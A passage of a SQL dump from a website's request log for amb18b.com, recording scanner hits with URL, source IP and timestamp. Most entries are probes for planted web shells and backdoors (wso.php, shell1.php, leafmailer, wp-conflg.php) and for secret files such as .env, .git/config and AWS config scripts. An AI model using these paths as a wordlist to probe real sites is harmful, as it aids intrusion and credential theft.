07:36:40'),(5164,'https://amb18b.com/1%25.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:42','2025-11-09 07:36:42'),(5165,'https://amb18b.com/wp-freya.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:44','2025-11-09 07:36:44'),(5166,'https://amb18b.com/keu.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:46','2025-11-09 07:36:46'),(5167,'https://amb18b.com/file88.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:48','2025-11-09 07:36:48'),(5168,'https://amb18b.com/0%25.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:50','2025-11-09 07:36:50'),(5169,'https://amb18b.com/lock360.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:52','2025-11-09 07:36:52'),(5170,'https://amb18b.com/jmfi2.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:54','2025-11-09 07:36:54'),(5171,'https://amb18b.com/class.1.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:56','2025-11-09 07:36:56'),(5172,'https://amb18b.com/fs.php','172.190.142.176','Direct Access',1,'2025-11-09 07:36:58','2025-11-09 07:36:58'),(5173,'https://amb18b.com/CLA.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:00','2025-11-09 07:37:00'),(5174,'https://amb18b.com/gfile.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:02','2025-11-09 07:37:02'),(5175,'https://amb18b.com/eauu.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:04','2025-11-09 07:37:04'),(5176,'https://amb18b.com/we.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:06','2025-11-09 07:37:06'),(5177,'https://amb18b.com/fe5.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:09','2025-11-09 07:37:09'),(5178,'https://amb18b.com/cccc.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:11','2025-11-09 07:37:11'),(5179,'https://amb18b.com/shell1.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:13','2025-11-09 07:37:13'),(5180,'https://amb18b.com/gm.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:15','2025-11-09 07:37:15'),(5181,'https://amb18b.com/lala.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:17','2025-11-09 07:37:17'),(5182,'https://amb18b.com/hexx.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:20','2025-11-09 07:37:20'),(5183,'https://amb18b.com/444.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:22','2025-11-09 07:37:22'),(5184,'https://amb18b.com/a2.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:24','2025-11-09 07:37:24'),(5185,'https://amb18b.com/cfile.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:26','2025-11-09 07:37:26'),(5186,'https://amb18b.com/lv.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:28','2025-11-09 07:37:28'),(5187,'https://amb18b.com/goat.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:30','2025-11-09 07:37:30'),(5188,'https://amb18b.com/aa.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:32','2025-11-09 07:37:32'),(5189,'https://amb18b.com/vast.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:34','2025-11-09 07:37:34'),(5190,'https://amb18b.com/cool.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:36','2025-11-09 07:37:36'),(5191,'https://amb18b.com/yanki.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:38','2025-11-09 07:37:38'),(5192,'https://amb18b.com/bolt.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:40','2025-11-09 07:37:40'),(5193,'https://amb18b.com/nfile.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:42','2025-11-09 07:37:42'),(5194,'https://amb18b.com/ilex.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:44','2025-11-09 07:37:44'),(5195,'https://amb18b.com/des.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:46','2025-11-09 07:37:46'),(5196,'https://amb18b.com/ext.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:48','2025-11-09 07:37:48'),(5197,'https://amb18b.com/axx.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:50','2025-11-09 07:37:50'),(5198,'https://amb18b.com/wp-update.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:52','2025-11-09 07:37:52'),(5199,'https://amb18b.com/yasnu.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:54','2025-11-09 07:37:54'),(5200,'https://amb18b.com/new4.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:56','2025-11-09 07:37:56'),(5201,'https://amb18b.com/ava.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:58','2025-11-09 07:37:58'),(5202,'https://amb18b.com/ioxi2.php','172.190.142.176','Direct Access',1,'2025-11-09 07:37:59','2025-11-09 07:37:59'),(5203,'https://amb18b.com/gfile1.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:01','2025-11-09 07:38:01'),(5204,'https://amb18b.com/ffile.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:03','2025-11-09 07:38:03'),(5205,'https://amb18b.com/rsnu.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:05','2025-11-09 07:38:05'),(5206,'https://amb18b.com/.well-known/acme-challenge/about.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:07','2025-11-09 07:38:07'),(5207,'https://amb18b.com/default.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:09','2025-11-09 07:38:09'),(5208,'https://amb18b.com/dfre.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:11','2025-11-09 07:38:11'),(5209,'https://amb18b.com/pp.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:13','2025-11-09 07:38:13'),(5210,'https://amb18b.com/13.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:14','2025-11-09 07:38:14'),(5211,'https://amb18b.com/usep.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:16','2025-11-09 07:38:16'),(5212,'https://amb18b.com/3.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:18','2025-11-09 07:38:18'),(5213,'https://amb18b.com/moon.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:20','2025-11-09 07:38:20'),(5214,'https://amb18b.com/0x.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:22','2025-11-09 07:38:22'),(5215,'https://amb18b.com/02.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:24','2025-11-09 07:38:24'),(5216,'https://amb18b.com/xv.php','172.190.142.176','Direct Access',1,'2025-11-09 07:38:25','2025-11-09 07:38:25'),(5217,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1%22','93.123.109.132','Direct Access',1,'2025-11-09 07:46:29','2025-11-09 07:46:29'),(5218,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/jquery.min.js?ver=3.7.1%22','93.123.109.132','Direct Access',1,'2025-11-09 07:46:46','2025-11-09 07:46:46'),(5219,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6%22','93.123.109.132','Direct Access',1,'2025-11-09 07:46:48','2025-11-09 07:46:48'),(5220,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6%22','93.123.109.132','Direct Access',1,'2025-11-09 07:46:50','2025-11-09 07:46:50'),(5221,'https://amb18b.com/.env','93.123.109.132','Direct Access',1,'2025-11-09 07:46:53','2025-11-09 07:46:53'),(5222,'https://amb18b.com/.git/config','93.123.109.132','Direct Access',1,'2025-11-09 07:46:56','2025-11-09 07:46:56'),(5223,'https://amb18b.com/backend/.env','93.123.109.132','Direct Access',1,'2025-11-09 07:47:00','2025-11-09 07:47:00'),(5224,'https://amb18b.com/admin/.env','93.123.109.132','Direct Access',1,'2025-11-09 07:47:03','2025-11-09 07:47:03'),(5225,'https://amb18b.com/core/.env','93.123.109.132','Direct Access',1,'2025-11-09 07:47:06','2025-11-09 07:47:06'),(5226,'https://amb18b.com/.env.bak','93.123.109.132','Direct Access',1,'2025-11-09 07:47:09','2025-11-09 07:47:09'),(5227,'https://amb18b.com/.git/logs/HEAD','93.123.109.132','Direct Access',1,'2025-11-09 07:47:19','2025-11-09 07:47:19'),(5228,'https://amb18b.com/%22https:/megabet333.biz/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3%22','93.123.109.132','Direct Access',1,'2025-11-09 07:47:21','2025-11-09 07:47:21'),(5229,'https://amb18b.com/.gitlab-ci.yml','93.123.109.132','Direct Access',1,'2025-11-09 07:47:22','2025-11-09 07:47:22'),(5230,'https://amb18b.com/config.json','93.123.109.132','Direct Access',1,'2025-11-09 07:47:25','2025-11-09 07:47:25'),(5231,'https://amb18b.com/config.js','93.123.109.132','Direct Access',1,'2025-11-09 07:47:28','2025-11-09 07:47:28'),(5232,'https://amb18b.com/aws-config.js','93.123.109.132','Direct Access',1,'2025-11-09 07:47:32','2025-11-09 07:47:32'),(5233,'https://amb18b.com/aws.config.js','93.123.109.132','Direct Access',1,'2025-11-09 07:47:35','2025-11-09 07:47:35'),(5234,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/i18n.min.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:55','2025-11-09 10:08:55'),(5235,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/hooks.min.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:55','2025-11-09 10:08:55'),(5236,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery.min.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:55','2025-11-09 10:08:55'),(5237,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery-migrate.min.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:55','2025-11-09 10:08:55'),(5238,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/ui/core.min.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:56','2025-11-09 10:08:56'),(5239,'https://amb18b.com//static.cloudflareinsights.com/beacon.min.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:56','2025-11-09 10:08:56'),(5240,'https://amb18b.com/default.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:57','2025-11-09 10:08:57'),(5241,'https://amb18b.com/wp-emoji-release.min.js','34.217.108.70','Direct Access',1,'2025-11-09 10:08:57','2025-11-09 10:08:57'),(5242,'https://amb18b.com//wp-includes/wlwmanifest.xml','137.184.239.246','Direct Access',1,'2025-11-09 10:19:41','2025-11-09 10:19:41'),(5243,'https://amb18b.com//?author=2','137.184.239.246','Direct Access',1,'2025-11-09 10:19:43','2025-11-09 10:19:43'),(5244,'https://amb18b.com/.git/config','213.209.157.81','Direct Access',1,'2025-11-09 10:37:53','2025-11-09 10:37:53'),(5245,'https://amb18b.com/.git/config','2.57.122.173','Direct Access',1,'2025-11-09 11:02:25','2025-11-09 11:02:25'),(5246,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.73.70.159','Direct Access',1,'2025-11-09 13:31:44','2025-11-09 13:31:44'),(5247,'https://amb18b.com//?author=2','34.73.70.159','Direct Access',1,'2025-11-09 13:31:46','2025-11-09 13:31:46'),(5248,'https://amb18b.com/sitemap.xml','106.75.21.243','Direct Access',1,'2025-11-09 14:16:23','2025-11-09 14:16:23'),(5249,'https://amb18b.com/sitemap.xml','106.75.32.110','Direct Access',1,'2025-11-09 14:16:44','2025-11-09 14:16:44'),(5250,'https://amb18b.com/wordpress/','34.28.213.164','Direct Access',1,'2025-11-09 16:15:51','2025-11-09 16:15:51'),(5251,'https://amb18b.com/old/','34.28.213.164','Direct Access',1,'2025-11-09 16:15:53','2025-11-09 16:15:53'),(5252,'https://amb18b.com/blog/','34.28.213.164','Direct Access',1,'2025-11-09 16:15:54','2025-11-09 16:15:54'),(5253,'https://amb18b.com/backup/','34.28.213.164','Direct Access',1,'2025-11-09 16:15:55','2025-11-09 16:15:55'),(5254,'https://amb18b.com/wp/','34.28.213.164','Direct Access',1,'2025-11-09 16:15:56','2025-11-09 16:15:56'),(5255,'https://amb18b.com/new/','34.28.213.164','Direct Access',1,'2025-11-09 16:15:59','2025-11-09 16:15:59'),(5256,'https://amb18b.com/components/com_creativecontactform/fileupload/index.php?file=trg3hf.jpg','196.251.87.191','Direct Access',1,'2025-11-09 20:12:24','2025-11-09 20:12:24'),(5257,'https://amb18b.com/new.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:22','2025-11-09 20:53:22'),(5258,'https://amb18b.com/ad.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:24','2025-11-09 20:53:24'),(5259,'https://amb18b.com/moderation.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:27','2025-11-09 20:53:27'),(5260,'https://amb18b.com/themes.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:33','2025-11-09 20:53:33'),(5261,'https://amb18b.com/jindex.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:36','2025-11-09 20:53:36'),(5262,'https://amb18b.com/wso.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:39','2025-11-09 20:53:39'),(5263,'https://amb18b.com/leaf.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:44','2025-11-09 20:53:44'),(5264,'https://amb18b.com/inc.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:53','2025-11-09 20:53:53'),(5265,'https://amb18b.com/system_log.php','173.239.254.215','Direct Access',1,'2025-11-09 20:53:56','2025-11-09 20:53:56'),(5266,'https://amb18b.com/gg.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:01','2025-11-09 20:54:01'),(5267,'https://amb18b.com/sim.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:04','2025-11-09 20:54:04'),(5268,'https://amb18b.com/admin/function.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:09','2025-11-09 20:54:09'),(5269,'https://amb18b.com/core.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:13','2025-11-09 20:54:13'),(5270,'https://amb18b.com/mail.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:16','2025-11-09 20:54:16'),(5271,'https://amb18b.com/xml.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:25','2025-11-09 20:54:25'),(5272,'https://amb18b.com/css.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:30','2025-11-09 20:54:30'),(5273,'https://amb18b.com/images/class-config.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:35','2025-11-09 20:54:35'),(5274,'https://amb18b.com/g.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:39','2025-11-09 20:54:39'),(5275,'https://amb18b.com/default.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:44','2025-11-09 20:54:44'),(5276,'https://amb18b.com/back.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:47','2025-11-09 20:54:47'),(5277,'https://amb18b.com/wp-admin/wp-conflg.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:50','2025-11-09 20:54:50'),(5278,'https://amb18b.com/content.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:52','2025-11-09 20:54:52'),(5279,'https://amb18b.com/leafmailer2.8.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:56','2025-11-09 20:54:56'),(5280,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php','173.239.254.215','Direct Access',1,'2025-11-09 20:54:59','2025-11-09 20:54:59'),(5281,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/up.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:02','2025-11-09 20:55:02'),(5282,'https://amb18b.com/wsa.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:05','2025-11-09 20:55:05'),(5283,'https://amb18b.com/f35.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:08','2025-11-09 20:55:08'),(5284,'https://amb18b.com/wp-l0gin.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:12','2025-11-09 20:55:12'),(5285,'https://amb18b.com/uploads/index.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:14','2025-11-09 20:55:14'),(5286,'https://amb18b.com/an.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:33','2025-11-09 20:55:33'),(5287,'https://amb18b.com/wp-includes/blocks/post-author-name/index.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:42','2025-11-09 20:55:42'),(5288,'https://amb18b.com/list/144.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:49','2025-11-09 20:55:49'),(5289,'https://amb18b.com/wp-admin/images/wp-conflg.php','173.239.254.215','Direct Access',1,'2025-11-09 20:55:54','2025-11-09 20:55:54'),(5290,'https://amb18b.com/wp-includes/SimplePie/autoload_classmap.php','173.239.254.215','Direct Access',1,'2025-11-09 20:56:11','2025-11-09 20:56:11'),(5291,'https://amb18b.com/wp-includes/images/chosen.php','173.239.254.215','Direct Access',1,'2025-11-09 20:56:13','2025-11-09 20:56:13'),(5292,'https://amb18b.com/wp-includes/theme-compat/wp-conflg.php?p=','173.239.254.215','Direct Access',1,'2025-11-09 20:56:16','2025-11-09 20:56:16'),(5293,'https://amb18b.com/wp-post-data.php','173.239.254.215','Direct Access',1,'2025-11-09 20:56:27','2025-11-09 20:56:27'),(5294,'https://amb18b.com/wp-includes/widgets/autoload_classmap.php','173.239.254.215','Direct Access',1,'2025-11-09 20:56:29','2025-11-09 20:56:29'),(5295,'https://amb18b.com/wp-admin/m.php?p=','173.239.254.215','Direct Access',1,'2025-11-09 20:56:33','2025-11-09 20:56:33'),(5296,'https://amb18b.com/wp-admin/css/colors/coffee/colors_26.php','173.239.254.215','Direct Access',1,'2025-11-09 20:56:36','2025-11-09 20:56:36'),(5297,'https://amb18b.com/wp-includes/js/tinymce/','173.239.254.215','Direct Access',1,'2025-11-09 20:56:40','2025-11-09 20:56:40'),(5298,'https://amb18b.com/wp-backing.php','173.239.254.215','Direct Access',1,'2025-11-09 20:56:44','2025-11-09 20:56:44'),(5299,'https://amb18b.com/wp-admin/css/colors/blue/acxx.php','173.239.254.215','Direct Access',1,'2025-11-09 20:56:55','2025-11-09 20:56:55'),(5300,'https://amb18b.com/wp-admin/css/colors/modern/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:57:00','2025-11-09 20:57:00'),(5301,'https://amb18b.com/wp-includes/Requests/src/Cookie/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:18','2025-11-09 20:58:18'),(5302,'https://amb18b.com/wp-includes/Requests/src/Proxy/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:22','2025-11-09 20:58:22'),(5303,'https://amb18b.com/wp-includes/Requests/src/Utility/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:25','2025-11-09 20:58:25'),(5304,'https://amb18b.com/wp-includes/blocks/comment-date/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:30','2025-11-09 20:58:30'),(5305,'https://amb18b.com/wp-includes/blocks/comments-pagination-numbers/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:33','2025-11-09 20:58:33'),(5306,'https://amb18b.com/wp-includes/blocks/comments-title/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:37','2025-11-09 20:58:37'),(5307,'https://amb18b.com/wp-includes/blocks/image/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:40','2025-11-09 20:58:40'),(5308,'https://amb18b.com/wp-includes/blocks/latest-posts/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:46','2025-11-09 20:58:46'),(5309,'https://amb18b.com/wp-includes/blocks/more/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:49','2025-11-09 20:58:49'),(5310,'https://amb18b.com/wp-includes/blocks/page-list-item/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:54','2025-11-09 20:58:54'),(5311,'https://amb18b.com/wp-includes/blocks/site-title/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:58:57','2025-11-09 20:58:57'),(5312,'https://amb18b.com/wp-includes/css/dist/components/index.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:00','2025-11-09 20:59:00'),(5313,'https://amb18b.com/wp-includes/js/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:04','2025-11-09 20:59:04'),(5314,'https://amb18b.com/wp-includes/js/tinymce/plugins/wptextpattern/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:07','2025-11-09 20:59:07'),(5315,'https://amb18b.com/wp-includes/js/wp-login.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:10','2025-11-09 20:59:10'),(5316,'https://amb18b.com/wp-includes/rest-api/av.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:13','2025-11-09 20:59:13'),(5317,'https://amb18b.com/wp-includes/sodium_compat/namespaced/Core/about.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:16','2025-11-09 20:59:16'),(5318,'https://amb18b.com/wp-includes/Text/Diff/Engine/new.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:19','2025-11-09 20:59:19'),(5319,'https://amb18b.com/wp-includes/css/dist/block-directory/index.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:22','2025-11-09 20:59:22'),(5320,'https://amb18b.com/wp-admin/back.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:27','2025-11-09 20:59:27'),(5321,'https://amb18b.com/admin.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:35','2025-11-09 20:59:35'),(5322,'https://amb18b.com/goods.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:41','2025-11-09 20:59:41'),(5323,'https://amb18b.com/m.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:47','2025-11-09 20:59:47'),(5324,'https://amb18b.com/css/index.php','173.239.254.215','Direct Access',1,'2025-11-09 20:59:58','2025-11-09 20:59:58'),(5325,'https://amb18b.com/file.php','173.239.254.215','Direct Access',1,'2025-11-09 21:00:00','2025-11-09 21:00:00'),(5326,'https://amb18b.com/wp-includes/ID3/index.php','173.239.254.215','Direct Access',1,'2025-11-09 21:00:06','2025-11-09 21:00:06'),(5327,'https://amb18b.com/wp.php','173.239.254.215','Direct Access',1,'2025-11-09 21:00:13','2025-11-09 21:00:13'),(5328,'https://amb18b.com/bless.php','173.239.254.215','Direct Access',1,'2025-11-09 21:00:16','2025-11-09 21:00:16'),(5329,'https://amb18b.com/ioxi-o.php','173.239.254.215','Direct Access',1,'2025-11-09 21:00:22','2025-11-09 21:00:22'),(5330,'https://amb18b.com/load.php','173.239.254.215','Direct Access',1,'2025-11-09 21:00:25','2025-11-09 21:00:25'),(5331,'https://amb18b.com/simple.php','173.239.254.215','Direct Access',1,'2025-11-09 21:00:36','2025-11-09 21:00:36'),(5332,'https://amb18b.com/about.php','193.19.109.61','Direct Access',1,'2025-11-09 21:00:38','2025-11-09 21:00:38'),(5333,'https://amb18b.com/wp-includes/IXR/','193.19.109.61','Direct Access',1,'2025-11-09 21:00:46','2025-11-09 21:00:46'),(5334,'https://amb18b.com/files.php','173.239.254.216','Direct Access',1,'2025-11-09 21:00:58','2025-11-09 21:00:58'),(5335,'https://amb18b.com/wp-admin/includes/index.php','193.19.109.63','Direct Access',1,'2025-11-09 21:01:13','2025-11-09 21:01:13'),(5336,'https://amb18b.com/wp-admin/includes/admin-ajax.php','173.239.254.218','Direct Access',1,'2025-11-09 21:04:19','2025-11-09 21:04:19'),(5337,'https://amb18b.com/wp-configs.php','173.239.254.224','Direct Access',1,'2025-11-09 21:04:37','2025-11-09 21:04:37'),(5338,'https://amb18b.com/wp-includes/index.php','173.239.254.240','Direct Access',1,'2025-11-09 21:04:39','2025-11-09 21:04:39'),(5339,'https://amb18b.com/wp-includes/css/dist/components/index.php','193.19.109.72','Direct Access',1,'2025-11-09 21:04:45','2025-11-09 21:04:45'),(5340,'https://amb18b.com/1.php','173.239.254.225','Direct Access',1,'2025-11-09 21:04:49','2025-11-09 21:04:49'),(5341,'https://amb18b.com/system.php','173.239.254.234','Direct Access',1,'2025-11-09 21:04:54','2025-11-09 21:04:54'),(5342,'https://amb18b.com/radio.php','85.8.130.18','Direct Access',1,'2025-11-09 21:04:56','2025-11-09 21:04:56'),(5343,'https://amb18b.com/zasf','85.8.130.18','Direct Access',1,'2025-11-09 21:05:01','2025-11-09 21:05:01'),(5344,'https://amb18b.com/av.php','173.239.254.212','Direct Access',1,'2025-11-09 21:05:07','2025-11-09 21:05:07'),(5345,'https://amb18b.com/wp-includes/class-json-ajax-session.php','85.8.130.18','Direct Access',1,'2025-11-09 21:05:11','2025-11-09 21:05:11'),(5346,'https://amb18b.com/wp-includes/Text/index.php','193.19.109.68','Direct Access',1,'2025-11-09 21:05:27','2025-11-09 21:05:27'),(5347,'https://amb18b.com/wp-conflg.php','173.239.254.239','Direct Access',1,'2025-11-09 21:05:29','2025-11-09 21:05:29'),(5348,'https://amb18b.com/wp-admin/css/wp-login.php','193.19.109.68','Direct Access',1,'2025-11-09 21:05:34','2025-11-09 21:05:34'),(5349,'https://amb18b.com/wp-includes/sitemaps/','173.239.254.211','Direct Access',1,'2025-11-09 21:05:37','2025-11-09 21:05:37'),(5350,'https://amb18b.com/wp-includes/pomo/index.php','173.239.254.224','Direct Access',1,'2025-11-09 21:05:43','2025-11-09 21:05:43'),(5351,'https://amb18b.com/wp-includes/blocks/archives/','193.37.33.221','Direct Access',1,'2025-11-09 21:05:47','2025-11-09 21:05:47'),(5352,'https://amb18b.com/wp-includes/css/dist/','173.239.254.234','Direct Access',1,'2025-11-09 21:05:50','2025-11-09 21:05:50'),(5353,'https://amb18b.com/wp-includes/fonts/index.php','173.239.254.234','Direct Access',1,'2025-11-09 21:05:53','2025-11-09 21:05:53'),(5354,'https://amb18b.com/wp-admin/js/widgets/index.php','173.239.254.234','Direct Access',1,'2025-11-09 21:05:59','2025-11-09 21:05:59'),(5355,'https://amb18b.com/wp-includes/certificates/index.php','173.239.254.234','Direct Access',1,'2025-11-09 21:06:04','2025-11-09 21:06:04'),(5356,'https://amb18b.com/bypass.php','193.19.109.64','Direct Access',1,'2025-11-09 21:06:24','2025-11-09 21:06:24'),(5357,'https://amb18b.com/wp-includes/Text/wp-login.php','85.8.130.17','Direct Access',1,'2025-11-09 21:06:31','2025-11-09 21:06:31'),(5358,'https://amb18b.com/wp-admin/admin-wolf.php','193.19.109.73','Direct Access',1,'2025-11-09 21:06:38','2025-11-09 21:06:38'),(5359,'https://amb18b.com/wp-signup.php','193.19.109.71','Direct Access',1,'2025-11-09 21:06:50','2025-11-09 21:06:50'),(5360,'https://amb18b.com/wp-admin/css/index.php','173.239.254.236','Direct Access',1,'2025-11-09 21:07:06','2025-11-09 21:07:06'),(5361,'https://amb18b.com/wp-includes/IXR/index.php','193.19.109.75','Direct Access',1,'2025-11-09 21:07:28','2025-11-09 21:07:28'),(5362,'https://amb18b.com/contact.php','173.239.254.218','Direct Access',1,'2025-11-09 21:13:15','2025-11-09 21:13:15'),(5363,'https://amb18b.com/wp-includes/widgets/include.php','173.239.254.231','Direct Access',1,'2025-11-09 21:15:20','2025-11-09 21:15:20'),(5364,'https://amb18b.com/cgi-bin/user/index.php','173.239.254.231','Direct Access',1,'2025-11-09 21:15:27','2025-11-09 21:15:27'),(5365,'https://amb18b.com/config.php','85.8.130.19','Direct Access',1,'2025-11-09 21:15:42','2025-11-09 21:15:42'),(5366,'https://amb18b.com/xmrlpc.php','193.19.109.64','Direct Access',1,'2025-11-09 21:15:47','2025-11-09 21:15:47'),(5367,'https://amb18b.com/wp-includes/js/codemirror/index.php','193.19.109.61','Direct Access',1,'2025-11-09 21:15:55','2025-11-09 21:15:55'),(5368,'https://amb18b.com/wp-admin/js/widgets/admin.php','193.19.109.61','Direct Access',1,'2025-11-09 21:16:00','2025-11-09 21:16:00'),(5369,'https://amb18b.com/wp-Owl.php','193.19.109.61','Direct Access',1,'2025-11-09 21:16:03','2025-11-09 21:16:04'),(5370,'https://amb18b.com/click.php','193.19.109.61','Direct Access',1,'2025-11-09 21:16:13','2025-11-09 21:16:13'),(5371,'https://amb18b.com/cong.php','193.19.109.61','Direct Access',1,'2025-11-09 21:16:17','2025-11-09 21:16:17'),(5372,'https://amb18b.com/wp-includes/html-api/','193.19.109.61','Direct Access',1,'2025-11-09 21:16:26','2025-11-09 21:16:26'),(5373,'https://amb18b.com/wp-includes/themes.php','173.239.254.230','Direct Access',1,'2025-11-09 21:16:32','2025-11-09 21:16:32'),(5374,'https://amb18b.com/aa.php','173.239.254.228','Direct Access',1,'2025-11-09 21:16:34','2025-11-09 21:16:34'),(5375,'https://amb18b.com/ss.php','173.239.254.228','Direct Access',1,'2025-11-09 21:16:37','2025-11-09 21:16:37'),(5376,'https://amb18b.com/cc.php','173.239.254.228','Direct Access',1,'2025-11-09 21:16:49','2025-11-09 21:16:49'),(5377,'https://amb18b.com/classwithtostring.php','173.239.254.228','Direct Access',1,'2025-11-09 21:16:53','2025-11-09 21:16:53'),(5378,'https://amb18b.com/wander.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:02','2025-11-09 21:17:02'),(5379,'https://amb18b.com/version.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:07','2025-11-09 21:17:07'),(5380,'https://amb18b.com/wp-admin/css/about.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:11','2025-11-09 21:17:11'),(5381,'https://amb18b.com/xx.php','173.239.254.228','Direct Access',1,'2025-11-09 21:17:15','2025-11-09 